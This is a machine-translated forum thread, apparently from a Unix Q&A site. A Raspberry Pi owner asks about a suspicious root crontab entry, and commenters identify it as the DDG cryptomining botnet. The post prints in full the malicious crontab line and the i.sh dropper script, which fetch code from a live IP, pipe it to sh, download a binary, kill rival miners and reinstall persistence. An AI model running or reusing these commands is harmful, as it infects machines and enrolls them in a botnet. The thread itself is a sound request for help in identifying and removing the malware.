내 Raspberry Pi의 루트 crontab 파일에 무언가를 추가하고 싶었고 의심스러운 것 같은 항목을 발견하여 Google에서 일부를 검색해도 아무것도 나타나지 않았습니다.
Crontab 항목 :
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
내용 http://103.219.112.66:8000/i.sh
은 다음 과 같습니다.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
내 Linux 지식은 제한적이지만 인도네시아 서버에서 바이너리를 다운로드하여 정기적으로 루트로 실행하는 것은 일반적인 것이 아닙니다.
이게 뭐야? 어떻게해야합니까?
16
원형입니다. 15 분마다 새로운 사본을 다운로드하여 설치합니다. 원격 서버의 사본이 변경되면 15 분 이내에이 cronjob을 실행하는 모든 서버가 새 코드를 실행합니다.
—
와일드 카드
라즈베리 파이가 인터넷에 연결되어 있습니까? 라즈베리 파이는 무엇입니까? 이것은 xribfa4를 검색 할 때 Google의 유일한 결과입니다. 이 작업을 수행해야하는 소프트웨어를 실행하지 않는 경우 바이러스 일 가능성이 있습니다.
—
kemotep
@kemotep는 문자열이 무작위이지만 IP는 Google이며 몇 가지 결과를 제공합니다. Ddg 마이닝 봇넷에 관한 것
—
18:49
찾았어요. IP가 인도네시아 정부 사이트에 등록되어 있다는 것은 미친 일입니다. 또한이 페이로드를 제공하는 거의 2000 개의 다른 IP가있는 것 같습니다.
—
kemotep
알아야 할 가장 중요한 점은 해당 crontab 항목을 제거하더라도 시스템에 여전히 감염 될 수있는 취약점이 있다는 것입니다. 해당 취약점을 찾아 수정해야합니다.
—
Hans-Martin Mosner